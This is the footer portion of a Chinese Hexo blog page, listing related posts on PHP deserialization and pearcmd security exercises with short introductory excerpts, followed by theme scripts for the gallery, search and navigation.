						<div class="relate-post-cover">
							<a href="/2026/04/19/%E6%AD%BB%E4%BA%A1%E7%BB%95%E8%BF%87/" title="死亡绕过">				
								
								<img class="lazy" src="/img/lazy.gif" data-src="/images/covers/南京街景.jpg" alt="死亡绕过"/>
							</a>
						</div>
					</li>												
			
					<li>
						<div class="relate-post-text">
							<a class="relate-post-title" href="/2026/03/13/Phar%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E6%BC%94%E7%A4%BA/" title="Phar反序列化漏洞演示">
								Phar反序列化漏洞演示			
							</a>
							<p class="relate-post-date">
								<i class="fa fa-calendar"></i>
								三月 13日, 2026				
							</p>
							<p class="relate-post-content">
								前言我们在之前学习的反序列化漏洞 无一不是利用了unserialize()这个函数 但是我们没有去考虑 假设此时的题目并没有给我们这个函数 我们还能否实现反序列化呢
其实是可以的 在2018年的BlackHat 大会上 Sam Tho...
							</p>
						</div>

						<div class="relate-post-cover">
							<a href="/2026/03/13/Phar%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E6%BC%94%E7%A4%BA/" title="Phar反序列化漏洞演示">				
								
								<img class="lazy" src="/img/lazy.gif" data-src="/images/covers/洱海边.jpg" alt="Phar反序列化漏洞演示"/>
							</a>
						</div>
					</li>												
			
					<li>
						<div class="relate-post-text">
							<a class="relate-post-title" href="/2026/03/12/pearcmd%E6%BC%8F%E6%B4%9E%E6%BC%94%E7%A4%BA/" title="pearcmd漏洞演示">
								pearcmd漏洞演示			
							</a>
							<p class="relate-post-date">
								<i class="fa fa-calendar"></i>
								三月 12日, 2026				
							</p>
							<p class="relate-post-content">
								1register_argc_argv性质这是PHP中的一个配置项 用于决定是否在脚本中声明_$argc_ 和 _$argv_ 变量这两个变量在命令行模式下是十分重要的

$argc：表示传递给脚本的参数数量
$argv:这是一个数组...
							</p>
						</div>

						<div class="relate-post-cover">
							<a href="/2026/03/12/pearcmd%E6%BC%8F%E6%B4%9E%E6%BC%94%E7%A4%BA/" title="pearcmd漏洞演示">				
								
								<img class="lazy" src="/img/lazy.gif" data-src="/images/covers/护城河.jpg" alt="pearcmd漏洞演示"/>
							</a>
						</div>
					</li>												
			
					<li>
						<div class="relate-post-text">
							<a class="relate-post-title" href="/2026/03/10/session%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E6%B5%8B%E8%AF%95/" title="session反序列化漏洞测试">
								session反序列化漏洞测试			
							</a>
							<p class="relate-post-date">
								<i class="fa fa-calendar"></i>
								三月 10日, 2026				
							</p>
							<p class="relate-post-content">
								前置知识首先我们要了解session是什么
session又被称为会话控制  和cookie类似 用于保持会话的但是cookie一般是存储再客户端的 session一般是存储在服务端的
在PHP中 有一个php_session变量 用...
							</p>
						</div>

						<div class="relate-post-cover">
							<a href="/2026/03/10/session%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E6%B5%8B%E8%AF%95/" title="session反序列化漏洞测试">				
								
								<img class="lazy" src="/img/lazy.gif" data-src="/images/covers/南京西路.jpg" alt="session反序列化漏洞测试"/>
							</a>
						</div>
					</li>												
			
					<li>
						<div class="relate-post-text">
							<a class="relate-post-title" href="/2026/02/16/%E6%9C%AA%E5%91%BD%E5%90%8D/" title="好东西">
								好东西			
							</a>
							<p class="relate-post-date">
								<i class="fa fa-calendar"></i>
								二月 16日, 2026				
							</p>
							<p class="relate-post-content">
								hello world

							</p>
						</div>

						<div class="relate-post-cover">
							<a href="/2026/02/16/%E6%9C%AA%E5%91%BD%E5%90%8D/" title="好东西">				
								
								<img class="lazy" src="/img/lazy.gif" data-src="/img/cart_cover.jpg" alt="好东西"/>
							</a>
						</div>
					</li>												
			
		</ul>
	
</div>	
				</div>
				<div class="investment-content-list">
					<div class="layout-comment">

	
		<div class="config-info">
			Please check the parameter of <b>comment</b> in config.yml of hexo-theme-Annie!
		</div>	
	

</div>
				</div>
				<div class="investment-content-list">
					<div class="layout-share">
	
	

		
			
			<!-- socialShare share -->
			<div class="social-share"></div>

<!--  css & js -->
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/social-share.js/1.0.16/css/share.min.css">
<script async src="https://cdnjs.cloudflare.com/ajax/libs/social-share.js/1.0.16/js/social-share.min.js"></script>
			
		
		
	
</div>


				</div>
			</div>	
		</div>
	</div>
</div>

<!-- show math formula -->



	





<link rel="stylesheet" href="/plugin/fancybox/jquery.fancybox.css">


<script src="/plugin/fancybox/jquery.fancybox.js"></script>


<script type="text/javascript">
	(function gallerySet(){
		let titleID = $('.article-title a'),
			imageID = $('.article-content img'),
			videoID = $('.article-content video');
		
		let postTitle = titleID.text() ? titleID.text() : "No post title!";
		
		imageID.each(function() {
			let imgPath = $(this).attr('src'),
				imgTitle = $(this).attr('alt') ? $(this).attr('alt') : "No image description!";
		
			//给每个匹配的<img>元素打包, 即添加父元素<a>
			$(this).wrap('<a data-fancybox="gallery" data-caption="《 ' + postTitle + ' 》' + imgTitle + '"href="' + imgPath + '"> </a>');
		});
		
		videoID.each(function() {
			let videoPath = $(this).attr('src');
		
			//给每个匹配的<img>元素打包, 即添加父元素<a>
			$(this).wrap('<a data-fancybox href=" ' + videoPath + ' "> </a>');
		});
		
		//TODO：支持html5 video

		if($('#layout-post').length) {
			$('[data-fancybox="gallery"]').fancybox({
				loop: true,
				buttons: [
					"zoom",
					"share",
					"slideShow",
					"fullScreen",
					//"download",
					"thumbs",
					"close"
				],
				protect: true
			});
		}
	})();
</script>
		</main>

		<!--footer-->
		<footer>
	<div id="navigation-show">
		<ul id="global-nav">
	
		<li class="menu-home">
			<a href="/" class="menu-item-home" target="_blank">主页</a>
		</li>
		
	
		<li class="menu-archive">
			<a href="/archives" class="menu-item-archive" target="_blank">归档</a>
		</li>
		
	
		<li class="menu-categories">
			<a href="/categories" class="menu-item-categories" target="_blank">分类</a>
		</li>
		
	
		<li class="menu-tags">
			<a href="/tags" class="menu-item-tags" target="_blank">标签</a>
		</li>
		
	
		<li class="menu-about">
			<a href="/about" class="menu-item-about" target="_blank">关于</a>
		</li>
		
	
		<li class="menu-gallery">
			<a href="/gallery" class="menu-item-gallery" target="_blank">相册</a>
		</li>
		
	

	
		<li class="menu-search">
			<a href="javascript:;" class="popup-trigger">搜索</a>
		</li>
	
</ul>
	</div>

	<div class="copyright">
		<p>
			 
				&copy;2025 - 2026, content by Su@sU. All Rights Reserved.
			
			
				<a href="http://hexo.io/" title="Hexo" target="_blank" rel="noopener">Hexo</a> Theme <a href="https://github.com/Sariay/hexo-theme-Annie" title="Annie" target="_blank" rel="noopener">Annie</a> by Sariay.
			
		</p>
		<p>
			

	<!-- busuanzi -->
	<!-- busuanzi -->



			<a href="javascript:zh_tran('s');" class="zh_click" id="zh_click_s">简体</a> 
			<a href="javascript:zh_tran('t');" class="zh_click" id="zh_click_t">繁體</a>				
		</p>
	</div>		
</footer>
		
	<!-- Local or hitokoto! -->

	
<script src="/plugin/motto/motto.js"></script>

	
	<script type="text/javascript">
		(function motto(){
			let mottoText = getMingYanContent().split('</br> - </br>'),
			
			mottoTextContent = mottoText[0]?mottoText[0]:'请刷新...',
			
			mottoTextFrom = mottoText[1]?mottoText[1]:'one/一个';
			
			mottoTextContent = mottoTextContent.trim().substring(0, 100);
		
			$("#motto-content").html( mottoTextContent);
			$("#motto-author").html( mottoTextFrom  );
		})();	
	</script>	



<!-- love effect -->

	
<script src="/plugin/love/love.js"></script>



<!-- back to top -->

	<div id="totop">
	<span class="icon-circle-up"></span>
</div>



<!-- site analysis -->


	<!-- site-analysis -->
	
	
	
	
	
 

<!-- leancloud -->


	<!-- leancloud -->
	<!--
	时间：2018-11-27
	描述：
		文章访问量：visitors
		文章喜欢量：likes	
		文章排行榜：topNPost
		其他得说明：
			01-Cookie相关的函数 
				https://blog.csdn.net/somehow1002/article/details/78511541（Author：somehow1002）
			02-visitors相关的函数 
				https://blog.csdn.net/u013553529/article/details/63357382（Author：爱博客大伯）
				https://notes.doublemine.me/2015-10-21-为NexT主题添加文章阅读量统计功能.html（Author：夏末）
			03-topNPost相关的函数
				https://hoxis.github.io/hexo-next-read-rank.html（Author：hoxis）
			04-likes相关的函数，
				参考了01 & 02进行简单的设计与实现
-->


	

  

	<!--
	时间：2018-10-3
	描述：
		插件名称：hexo-generator-search-zip
		插件来源: https://github.com/SuperKieran/hexo-generator-search-zip
		代码参考：https://github.com/SuperKieran/TKL/blob/master/layout/_partial/search.ejs(Include: js & css)	
-->
<div class="popup search-popup local-search-popup scrollbar" >
	<div class="local-search-container">
		<span class="popup-btn-close">
      		ESC
   		</span>
		<div class="local-search-header">
			<div class="input-prompt">				
			</div>
			<input autocomplete="off" placeholder="Search..." type="text" id="local-search-input">
		</div>
		<div class="local-search-body">
			<div id="local-search-output"></div>
		</div>
		<div class="local-search-footer">
			<div class="topN-post">				
				
								
			</div>
		</div>
	</div>
</div>


<script src="/plugin/search/ziploader.js"></script>
<script src="/js/search.js"></script>


<script type="text/javascript">
	var search_path = 'search.xml',
		zip_Path = '/',
		version_Path = '/',
		input_Trigger = 'auto',
		top_N = '2';

	themeLocalSearch({
		search_path, 
		zip_Path, 
		version_Path, 
		input_Trigger, 
		top_N
	});
</script>



<script src="/plugin/chinese/chinese.js"></script>
<script src="/plugin/imagelazyloader/yall.min.js"></script>
<script src="/plugin/imageloaded/imagesloaded.pkgd.min.js"></script>
<script src="/plugin/nicescroll/jquery.nicescroll.js"></script>
<script src="/plugin/resizediv/resizediv.js"></script>
<script src="/js/main.js"></script>

	</body>	
</html>